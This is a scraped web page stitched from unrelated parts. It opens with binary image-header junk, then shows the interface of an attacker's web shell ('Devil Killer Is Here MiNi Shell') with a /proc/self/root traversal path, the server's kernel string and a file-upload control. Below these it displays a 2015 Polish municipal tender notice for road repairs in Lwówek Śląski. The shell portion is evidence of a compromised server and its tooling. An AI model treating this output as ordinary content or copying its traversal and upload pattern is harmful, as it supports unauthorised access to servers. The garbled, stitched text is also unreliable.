JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150310/52758-N-2015.html

<p class="kh_header"><b>Lwówek Śląski: Remonty nawierzchni bitumicznych i tłuczniowych wraz z infrastrukturą towarzyszącą wykonywane w ramach bieżącego utrzymania dróg gminnych na terenie miasta i gminy Lwówek Śląski w terminie do dnia 31.03.2017.</b><br>
<b>Numer ogłoszenia: 52758 - 2015; data zamieszczenia: 10.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lwówek Śląski , al.  Wojska Polskiego 25A, 59-600 Lwówek Śląski, woj. dolnośląskie, tel. 075 6477888, faks 075 6477889.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lwowekslaski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty nawierzchni bitumicznych i tłuczniowych wraz z infrastrukturą towarzyszącą wykonywane w ramach bieżącego utrzymania dróg gminnych na terenie miasta i gminy Lwówek Śląski w terminie do dnia 31.03.2017..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakresie bieżącego utrzymania dróg gminnych wykonywane będą następujące roboty:
1. Remont  cząstkowy  nawierzchni bitumicznych mieszanką  mineralno - asfaltową z wycinaniem krawędzi, przy  grubości warstwy  do 5  cm /pełny  zakres  robót  łącznie  z  wywózką  gruzu  na  wysypisko/,  pow. łat  do  5 m2 w ilości 1.400,00 m2.   
2.  Remont  cząstkowy  nawierzchni bitumicznych mieszanką  mineralno- asfaltową  za każdy dalszy 1 cm grubości,  pow. łat  do  5 m2 w ilości 140,00 m2.         
3. Remont cząstkowy nawierzchni bitumicznych mieszanką  mineralno- asfaltową z wycinaniem krawędzi,  przy  grubości warstwy do  5  cm /pełny  zakres  robót  łącznie  z  wywózką  gruzu  na  wysypisko /,  pow. łat powyżej  5 m2 w ilości 600,00 m2.  
4. Remont  cząstkowy  nawierzchni bitumicznych mieszanką  mineralno- asfaltową  za każdy dalszy 1 cm grubości, pow. łat powyżej  5 m2 w ilości 40,00 m2.
5. Wykonanie  warstwy  wyrównawczej  z  masy  mineralno -  asfaltowej  grub.  3 cm w ilości 200,00 m2. 
6. Wykonanie  warstwy  wyrównawczej z  masy  mineralno - asfaltowej  za każdy dalszy 1 cm grubości w ilości 40,00 m2.
7. Wykonanie  warstwy  ścieralnej z  masy  mineralno - asfaltowej grub. 3 cm w ilości 200,00 m2.
8. Wykonanie  warstwy  ścieralnej z  masy  mineralno - asfaltowej  za każdy dalszy 1 cm grubości w ilości 40,00 m2.
9. Remont  cząstkowy  nawierzchni   chodników  z  płyt bet.  50 x 50 x 7 i 30 x 30 x 5  na  podsypce  cement. - piask.  z  wykorzystaniem  płytek z rozbiórki i uzupełnieniem podbudowy w ilości 20,00 m2.
10. Remont  cząstkowy  nawierzchni   chodników  z  płyt bet.  50 x 50 x 7 i 30 x 30 x 5  na  podsypce  cement. - piask. - materiał (płytki chodnikowe) wykonawcy, z uzupełnieniem podbudowy w ilości 20,00 m2.
11. Remont cząstkowy nawierzchni z kostki brukowej betonowej na podsypce cem.-piaskowej z wykorzystaniem kostki z rozbiórki i uzupełnieniem podbudowy w ilości 20,00 m2.
12. Remont cząstkowy nawierzchni z kostki brukowej betonowej na podsypce cem.-piaskowej- materiał (kostka betonowa) wykonawcy, z uzupełnieniem podbudowy w ilości 20,00 m2.
13. Remont cząstkowy nawierzchni z kostki brukowej granitowej na podsypce cem.-piaskowej     z wykorzystaniem kostki z rozbiórki i z uzupełnieniem podbudowy w ilości 20,00 m2.
14. Remont cząstkowy nawierzchni z kostki brukowej granitowej na podsypce cem.-piaskowej - materiał (kostka granitowa) wykonawcy, z uzupełnieniem podbudowy w ilości 20,00 m2.
15. Ustawienie  krawężnika  betonowego  prasowanego szarego  15 x 30  na    podsypce  cem - piask. z wykonaniem  ławy betonowej w  ilości  0,06m3/ 1 mb oraz robotami ziemnymi, zagospodarowaniem ziemi przez wykonawcę  (odcinki proste i łukowe) w ilości 40,00 m.
16. Ułożenie  obrzeży  wibroprasowanych  szarych 8 x 30 cm na  ławie  betonowej w  ilości  0,03 m3/1 mb z robotami ziemnymi, zagospodarowaniem ziemi przez wykonawcę (odcinki proste i łukowe) w ilości 40,00 m.
17. Ułożenie  chodnika  z  kostki  brukowej betonowej gr. 8 cm koloru  szarego  na  podsypce cementowo- piaskowej w ilości 80,00 m2.
18. Oczyszczenie rowu z namułu o gr. 20 cm wraz z zagospodarowaniem urobku przez wykonawcę w ilości 40,00 m.
19. Oczyszczenie rowu z namułu za każde dalsze 5 cm wraz z zagospodarowaniem urobku przez wykonawcę w ilości 40,00 m.
20. Umocnienie skarp płytami ażurowymi wielootworowymi typu jomb w ilości 30,00 m2.
21. Ułożenie ścieków z elementów betonowych 33x30x100 na ławie betonowej z oporem w ilości 50,00 m.
22. Likwidacja zapadlisk w drodze i chodniku lub innym terenie poprzez uzupełnienie kruszywem wraz z zagęszczeniem w ilości 30,00 m3.
23. Remont nawierzchni tłuczniowej o  głębokości  wyboju do 15 cm w ilości 800,00 m2.
24. Remont nawierzchni tłuczniowej o głębokości wyboju - za każde dalsze 5 cm w ilości 200,00 m2.
25. Korytowanie na głębokość 10 cm wraz z profilowaniem i zagęszczeniem koryta, zagospodarowaniem ziemi przez wykonawcę w ilości 150,00 m2.
26. Korytowanie - za każde dalsze 5 cm wraz z zagospodarowaniem ziemi przez wykonawcę w ilości 60,00 m2.
27. Roboty ziemne wykonywane koparką podsiębierną o poj. łyżki 0,15-0,40 m3 w gruncie kat III-IV wraz z transportem urobku na odl. do 5 km w ilości 80,00 m2.
28. Profilowanie i zagęszczenie istniejącej nawierzchni/podbudowy tłuczniowej w ilości 2.000,00 m2.
29. Wykonanie dolnej warstwy podbudowy z kruszywa kamiennego łamanego 31,5-63 grubość warstwy po zagęszczeniu 15 cm w ilości 200,00 m2.
30. Wykonanie dolnej warstwy podbudowy z kruszywa kamiennego łamanego frakcji 31,5-63 za każdy dalszy 1 cm grubości po  zagęszczeniu w ilości 200,00 m2.
31. Wykonanie górnej warstwy podbudowy z kruszywa kamiennego łamanego 0-31,5  grubość warstwy po zagęszczeniu 10 cm w ilości 200,00 m2.
32. Wykonanie górnej warstwy podbudowy z kruszywa kamiennego łamanego frakcji 0-31,5 za każdy dalszy 1 cm grubości po zagęszczeniu w ilości 200,00 m2.
33. Remont drogi o nawierzchni tłuczniowej w ilości 700,00 m2
- korytowanie 15 cm
- mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni - kat. gruntu I-IV   
- warstwa odcinająca z piasku, grubość warstwy po zagęszczeniu 10  cm
- warstwa dolna z kruszywa kamiennego łamanego frakcji 31,5-63  grubość warstwy po zagęszczeniu 15 cm 
- warstwa górna  z kruszywa kamiennego łamanego - frakcji 31,5-63 z zagęszczeniem grubość warstwy po zagęszczeniu 8 cm
- uzupełnienie poboczy odpadem kamiennym grub. 13 cm.
34. Mechaniczne plantowanie poboczy grubość ścinania 10 cm w ilości 50,00 m2.
35. Koszenie poboczy wraz z odwozem odpadów w ilości 60.000,00 m2.
36. Wycinka krzaków wraz z odwozem odpadów w ilości 160,00 m2.
37. Wycięcie gałęzi drzew do wysokości 2,20 m wraz z odwozem odpadów w ilości 40,00 h.
38. Oczyszczenie korytek ściekowych betonowych z zagospodarowaniem zanieczyszczeń przez wykonawcę w ilości 1.000,00 m.
39. Regulacja wpustów ulicznych w ilości 4 szt.
40. Regulacja studzienek w ilości 4 szt.
41. Wymiana/uzupełnienie kratek ściekowych wraz ze złomowaniem w ilości 4 szt.
42. Remont/wymiana przykanalika kanalizacji deszczowej o długości do 10 m na rury PVC          o średnicy 160 mm wraz z robotami ziemnymi, rozbiórką i odtworzeniem nawierzchni bitumicznej w ilości 20,00 m.
43. Remont/wymiana przykanalika kanalizacji deszczowej o długości do 10 m na rury PVC          o średnicy 160 mm wraz z robotami ziemnymi, rozbiórką i odtworzeniem nawierzchni         z kostki brukowej betonowej (kostka z rozbiórki) w ilości 20,00 m.
44. Remont/wymiana przykanalika kanalizacji deszczowej o długości do 10 m na rury PVC          o średnicy 160 mm wraz z robotami ziemnymi, rozbiórką i odtworzeniem nawierzchni          z płytek chodnikowych betonowych ( 30% płytek chodnikowych z rozbiórki) w ilości 20,00 m.
45. Remont/wymiana przykanalika kanalizacji deszczowej o długości do 10 m na rury PVC          o średnicy 160 mm wraz z  robotami ziemnymi, rozbiórką i odtworzeniem nawierzchni gruntowej w ilości 20,00 m.
46. Remont/wymiana przykanalika kanalizacji deszczowej o długości do 10 m na rury PVC         o średnicy 200 mm wraz z robotami ziemnymi, rozbiórką i odtworzeniem nawierzchni bitumicznej w ilości 20,00 m.
47. Remont/wymiana przykanalika kanalizacji deszczowej o długości do 10 m na rury PVC          o średnicy 200 mm wraz z robotami ziemnymi, rozbiórką i odtworzeniem nawierzchni          z kostki brukowej betonowej (kostka z rozbiórki) w ilości 20,00 m.
48. Remont/wymiana przykanalika kanalizacji deszczowej o długości do 10 m na rury PVC          o średnicy 200 mm wraz z robotami ziemnymi rozbiórką i odtworzeniem nawierzchni           z płytek chodnikowych betonowych ( 30% płytek chodnikowych z rozbiórki) w ilości 20,00 m.
49. Remont/wymiana przykanalika kanalizacji deszczowej o długości do 10 m na rury PVC          o średnicy 200 mm wraz z robotami ziemnymi, rozbiórką i odtworzeniem nawierzchni gruntowej w ilości 20,00 m.
50. Naprawa poręczy/ elementów (słupki, pochwyt, przeciągi, szczeblinki) poręczy mostowych sztywnych z rur stalowych o średnicy od 25 mm do 50 mm w ilości 20,00 m.
51. Naprawa poręczy/ elementów (słupki, pochwyt, przeciągi, szczeblinki) poręczy mostowych sztywnych z płaskowników o wymiarze od 25 mm do 50 mm w ilości 20,00 m.
52. Naprawa konstrukcji betonowych w ilości 4,00 m3.
53. Naprawa (przemurowanie) konstrukcji z kamienia na zaprawie cementowej w ilości 4,00 m3.
54. Uzupełnienie konstrukcji z kamienia na zaprawie cementowej  - materiał Wykonawcy w ilości 4,00 m3.
55. Przebudowa przepustu z rur betonowych o średnicy 400 - 600 mm na przepust z rur karbowanych PEHD o wytrzymałości 8 KP/m, o średnicy 400 mm z wykonaniem ścianek czołowych z kamienia granitowego na zaprawie cementowej w ilości 12,00 m.
56. Przebudowa przepustu z rur betonowych o średnicy 400 - 600 mm na przepust z rur karbowanych PEHD o wytrzymałości 8 KP/m,  o średnicy 600 mm z wykonaniem ścianek czołowych z kamienia granitowego na zaprawie cementowej w ilości 12,00 m.
57. Przebudowa przepustu z rur betonowych o średnicy 400 - 600 mm na przepust z rur karbowanych PEHD o wytrzymałości 8 KP/m,  o średnicy 800 mm z wykonaniem ścianek czołowych z kamienia granitowego na zaprawie cementowej w ilości 12,00 m.
58. Wykonanie przepustu z rur karbowanych PEHD o średnicy 400 mm z wykonaniem ścianek czołowych z kamienia granitowego na zaprawie cementowej w ilości 12,00 m.
59. Wykonanie przepustu z rur karbowanych PEHD o średnicy 600 mm z wykonaniem ścianek czołowych z kamienia granitowego na zaprawie cementowej w ilości 12,00 m.
60. Wykonanie przepustu z rur karbowanych PEHD o średnicy 800 mm z wykonaniem ścianek czołowych z kamienia granitowego na zaprawie cementowej w ilości 12,00 m.
61. Wykonanie przepustu z rur karbowanych PEHD o średnicy 1000 mm z wykonaniem ścianek czołowych z kamienia granitowego na zaprawie cementowej w ilości 12,00 m.
62. Ścieżka rowerowa Lwówek Śląski - Mojesz do granicy gminy: usunięcie uszkodzeń spowodowanych przez korzenie drzew: odsłonięcie i przycięcie korzeni, naprawa uszkodzonego miejsca w ilości 25,00 szt..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Roboty budowlane w zakresie bieżącego utrzymania dróg gminnych wraz z infrastrukturą do wartości 50% umowy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.31.41-9, 45.23.31.62-2, 45.23.32.52-0, 45.20.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3000 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie zadanych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że:
w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum 1 robotę budowlaną, której przedmiotem był remont dróg o nawierzchni bitumicznej lub tłuczniowej o wartości robót nie mniejszej niż 100.000,00 zł brutto (w przypadku Wykonawców zagranicznych Zamawiający dokona przeliczenia waluty obcej na PLN według średniego kursu ogłoszonego przez Narodowy Bank Polski na dzień otwarcia ofert).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie zadanych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że stosownie do przepisów ustawy Prawo Budowlane dysponuje: osobą pełniącą funkcję Kierownika robót, posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej w ograniczonym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że:
a)	jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość nie mniejszą niż 200.000,00zł.
b)	posiada wolne środki finansowe lub zdolność kredytową nie mniejszą niż 50.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - stawka robocizny kosztorysowej netto - 1</li>
<li>3 - wskaźnik narzutu kosztów pośrednich - 2</li>
<li>4 - wskaźnik narzutu zysku - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza wprowadzenie do umowy wyłącznie wymienionych w pkt 21 SIWZ  zmian w drodze aneksu, poprzedzonych pisemnym umotywowanym wnioskiem strony zainteresowanej wprowadzeniem wnioskowanych zmian z uwzględnieniem warunków ich wprowadzenia:
1.1.	Dopuszczalna jest zmiana wynagrodzenia wykonawcy:
1.1.1.	w sytuacji wejścia Polski do strefy euro pod warunkiem, że będzie wprowadzone    w drodze ustawy, a nieuwzględnienie ich w wartości wynagrodzenia wykonawcy będzie mu groziło rażącą stratą. Warunkiem wprowadzenia zmiany jest przedstawienie przez Wykonawcę wyliczenia wskazującego na poniesienie rażącej straty.
1.1.2.	w przypadku zmiany w okresie obowiązywania umowy stawki podatku VAT, wynagrodzenie brutto ulegnie zmianie stosownie do zmiany tej stawki, przy czym wynagrodzenie netto pozostaje bez zmian.
1.1.3. po upływie każdych 365 dni obowiązywania umowy na pisemny wniosek Wykonawcy, złożony nie później niż do końca każdego okresu 365 dni obowiązywania umowy  z uwzględnieniem następujących zasad:
1.1.3.1. zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r.                o minimalnym wynagrodzeniu za pracę - zmianie ulegnie oferowana wartość stawki jednej roboczogodziny proporcjonalnie do zmiany wysokości minimalnego wynagrodzenia za pracę
1.1.3.2. zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne - zmianie ulegnie oferowana wartość stawki jednej roboczogodziny proporcjonalnie do wprowadzonych zmian zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.lwowekslaski.pl/wiadomosci/6733/lista/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta Lwówek Śląski
